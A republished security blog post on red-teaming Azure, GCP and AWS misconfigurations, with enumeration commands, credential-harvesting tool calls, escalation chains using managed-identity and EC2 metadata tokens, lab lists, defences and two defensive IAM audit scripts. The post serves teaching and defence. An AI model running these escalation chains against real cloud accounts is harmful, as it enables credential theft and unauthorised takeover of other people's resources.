Red Teaming the Cloud: Exploiting Misconfigurations in Azure, GCP, and AWS
The article examines key challenges in cloud infrastructure security, including misconfigurations in identity management, access control and resource provisioning. Azure, GCP and AWS all face potential attack risks such as over-privileged roles, public storage containers and exposed service principal credentials. Red teams can use these weaknesses for privilege escalation, data exfiltration or persistent access. Defences include hardening IAM policies, monitoring logs and using security tools. 2025-8-1 04:15:56 Author: infosecwriteups.com

The pivot to cloud infrastructure has fundamentally reshaped the adversarial landscape. Enterprises leveraging Azure and Google Cloud Platform (GCP) often underestimate the complexity of securing distributed identities, role-based access control (RBAC), and resource provisioning models. The result is misconfigurations that red teams can weaponize to escalate privileges, exfiltrate sensitive data, or gain persistent access.

Azure:

Credentialed Access (via Az CLI):

az login # Authenticate as a user or service principal.
az account list # Enumerate subscriptions.
az ad user list # Dump AD users.
az role assignment list # Identify excessive privileges.
az ad sp list --show-mine # Show service principals owned by the current user.
az storage account list # Discover storage accounts (then inspect their container access levels).

MicroBurst (PowerShell)

Invoke-EnumerateAzureBlobs -Verbose
Invoke-EnumerateAzureSubDomains -Verbose
Get-AzurePasswords -Verbose

Google Cloud Platform (GCP):

Enumeration with gcloud CLI:

gcloud auth login
gcloud projects list
gcloud iam roles list --project=<project-id>
gcloud iam service-accounts list
gcloud projects get-iam-policy <project-id>

CloudFox Sample Command:

cloudfox gcp -p <project-id> --all

CloudFox IAM mapping visualization

AWS (Amazon Web Services)

Credentialed Enumeration via AWS CLI:

aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws iam list-policies --scope Local
aws s3 ls

Tools: enumerate-iam, Pacu, CloudSploit, ScoutSuite, awscli

Misconfigurations typically arise from over-permissive IAM policies, unintended exposure of public resources, and a lack of awareness of internal privilege boundaries.

Azure Misconfigurations

Misconfigurations, Attack Vector & Impact:

  • Contributor Role on Subscription: Allows resource creation including Function Apps and Key Vault abuse.
  • Public Storage Containers: Permits unauthenticated access, data leakage, or malware hosting.
  • Exposed Service Principal Credentials: Hardcoded or leaked secrets reused to impersonate privileged services.
  • App Registration Token Disclosure: Tokens exposed in logs or repository; escalated Graph API access or identity impersonation.

Tools: MicroBurst, StormSpotter, AADInternals, Az CLI

GCP Misconfigurations

Misconfigurations, Attack Vector & Impact:

  • Public GCS Buckets: Threat actors can list, download, or overwrite sensitive content.
  • Metadata API Exposure on Compute Instances: Credential harvesting via <IP>; enables lateral movement.
  • Editor/Owner IAM Roles: Complete project takeover; excessive default access.
  • Function Deployment Rights: Allows attackers to deploy backdoored Cloud Functions with persistence.

Tools: gcloud, CloudFox, GCPBucketBrute, Pacu

AWS Misconfigurations

Misconfigurations, Attack Vector & Impact:

  • IAM Policy Wildcards (e.g., "Action":"*"): Grants unrestricted access to services, enabling privilege escalation.
  • Public S3 Buckets: Leads to data leakage or malware hosting in storage
  • Over-Privileged Lambda Functions: Lambda with broad IAM can invoke other services or modify resources.
  • EC2 Metadata Service Abuse: Unrestricted access to 169.254.169.254 yields AWS temporary credentials for privilege escalation
  • Misconfigured AssumeRole Policies: Cross-account or unintended role escalation via AWS STS AssumeRole

Tools: enumerate-iam, CloudSploit, Pacu, ScoutSuite, AWSBucketDump
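A defender-side check for the IAM wildcard misconfiguration listed above, added here as an example and not code from the original post: it parses a constructed policy document (in the shape `aws iam get-policy-version` returns under PolicyVersion.Document) and flags Allow statements that use a `*` action, a `service:*` action, NotAction, or a `*` resource.

```python
"""Flag over-broad Allow statements in an AWS IAM policy document.

Added example (not code from the original post): an offline check for the
"Action":"*" pattern described above. SAMPLE_POLICY is a constructed document
standing in for `aws iam get-policy-version` output.
"""
import json

def _as_list(value):
    """IAM accepts a string or a list for Action/Resource; normalise to a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)

def find_wildcards(policy_doc):
    """Return (sid, reason) findings for Allow statements that use '*' or
    'service:*' actions, a '*' resource, or NotAction (everything not listed)."""
    findings = []
    statements = policy_doc.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be given unwrapped
        statements = [statements]
    for idx, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements narrow access, so they are not findings
        sid = stmt.get("Sid", f"statement[{idx}]")
        actions = _as_list(stmt.get("Action"))
        if "*" in actions:
            findings.append((sid, "Action is '*' (full administrative access)"))
        for act in actions:
            if act != "*" and act.endswith(":*"):
                findings.append((sid, f"service-wide wildcard {act}"))
        if "NotAction" in stmt:
            findings.append((sid, "NotAction grants every action except those listed"))
        if "*" in _as_list(stmt.get("Resource")):
            findings.append((sid, "Resource is '*' (applies to every resource)"))
    return findings

# Constructed sample: an admin statement, a scoped read-only one, and an iam:* one.
SAMPLE_POLICY = json.loads("""
{"Version": "2012-10-17", "Statement": [
  {"Sid": "AdminAll", "Effect": "Allow", "Action": "*", "Resource": "*"},
  {"Sid": "BucketRead", "Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
   "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]},
  {"Sid": "IamAny", "Effect": "Allow", "Action": "iam:*", "Resource": "*"}]}
""")

if __name__ == "__main__":
    for sid, reason in find_wildcards(SAMPLE_POLICY):
        print(f"{sid}: {reason}")
```

Run it against the customer-managed policies returned by `aws iam list-policies --scope Local` to find the wildcards before an attacker does.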

Azure Escalation Chain Example:

az functionapp create --name evilapp --resource-group rg1 --storage-account mystorage
curl -H Metadata:true "http://localhost:8080/msi/token?resource=https://graph.microsoft.com"
curl -X GET -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/users

GCP Escalation Chain Example:

gcloud auth activate-service-account --key-file=creds.json
gcloud iam service-accounts impersonate --target-service-account [email protected]
gcloud functions deploy rcefunc --runtime python39 --trigger-http --entry-point=main

AWS Escalation Chain Example:

# Access metadata from EC2 instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Use harvested creds to escalate via STS
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name <extracted-user>

Azure Labs

  • HTB → Ready
  • CloudGoat Azure
  • Azurite + Local MSI Emulation

GCP Labs

  • Flaws.cloud (GCP)
  • CloudGoat GCP Fork
  • Pacu Lab Scripts

AWS Labs

  • CloudGoat AWS
  • Flaws2.cloud
  • Pacu + LocalStack
  • Terraform AWS IAM Playground

Cloud Platform and Defensive Measures

  • Azure: Monitor Function App logs; enforce RBAC and minimal app scopes.
  • GCP: Audit IAM bindings; block metadata access from exposed services.
  • AWS: Restrict IAM wildcards; monitor STS use and EC2 metadata logs.

Tools: ScoutSuite, Prowler, Security Hub, CloudSploit, AWS Config
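The "Audit IAM bindings" step for GCP, added here as an example that is not part of the original post: it runs offline over a constructed policy in the JSON shape returned by `gcloud projects get-iam-policy <project-id> --format=json` and reports Owner/Editor bindings (including the default Compute Engine service account, which any VM using it can obtain a token for through the metadata server) and any public principal. The project number and addresses in the sample are made up.

```python
"""Audit a GCP project IAM policy for primitive roles and public principals.

Added example, not code from the original post. It runs offline over a
constructed policy in the JSON shape that
`gcloud projects get-iam-policy <project-id> --format=json` returns, and
flags roles/owner and roles/editor bindings (the "Editor/Owner IAM Roles"
misconfiguration above) plus any allUsers/allAuthenticatedUsers member.
"""
import json

PRIMITIVE_ROLES = {"roles/owner", "roles/editor"}
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

def describe(member):
    """Say who a member is, calling out the default Compute Engine service
    account, whose token any VM using it can fetch from the metadata server."""
    if member.endswith("-compute@developer.gserviceaccount.com"):
        return "default Compute Engine service account"
    return "service account" if member.startswith("serviceAccount:") else "principal"

def audit_bindings(policy):
    """Return (member, role, reason) findings in binding order."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        note = " (conditional binding)" if "condition" in binding else ""
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                findings.append((member, role, "public principal at project level"))
            elif role in PRIMITIVE_ROLES:
                findings.append((member, role, f"primitive role on {describe(member)}{note}"))
    return findings

# Constructed sample policy; the project number and addresses are made up.
SAMPLE_POLICY = json.loads("""
{"version": 3, "bindings": [
  {"role": "roles/owner", "members": ["user:alice@example.com"]},
  {"role": "roles/owner", "members": ["user:oncall@example.com"],
   "condition": {"title": "temp", "expression": "request.time < timestamp('2026-01-01T00:00:00Z')"}},
  {"role": "roles/editor", "members": [
     "serviceAccount:123456789012-compute@developer.gserviceaccount.com", "group:devs@example.com"]},
  {"role": "roles/viewer", "members": ["allAuthenticatedUsers", "user:bob@example.com"]},
  {"role": "roles/storage.objectViewer",
   "members": ["serviceAccount:app@example-project.iam.gserviceaccount.com"]}]}
""")

if __name__ == "__main__":
    for member, role, reason in audit_bindings(SAMPLE_POLICY):
        print(f"{role:<30} {member:<65} {reason}")
```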

Cloud security is a lattice of privilege inheritance, implicit trust, and user error. Red teams must embrace cloud-native tactics that move laterally across identity providers, abuse role assumptions, and persist in serverless environments.

In 2025, the most dangerous cloud exploit isn’t a vulnerability; it’s a misconfigured role you forgot existed.


Source: https://infosecwriteups.com/red-teaming-the-cloud-exploiting-misconfigurations-in-azure-gcp-and-aws-0f84530528ab?source=rss----7b722bfd1b8d---4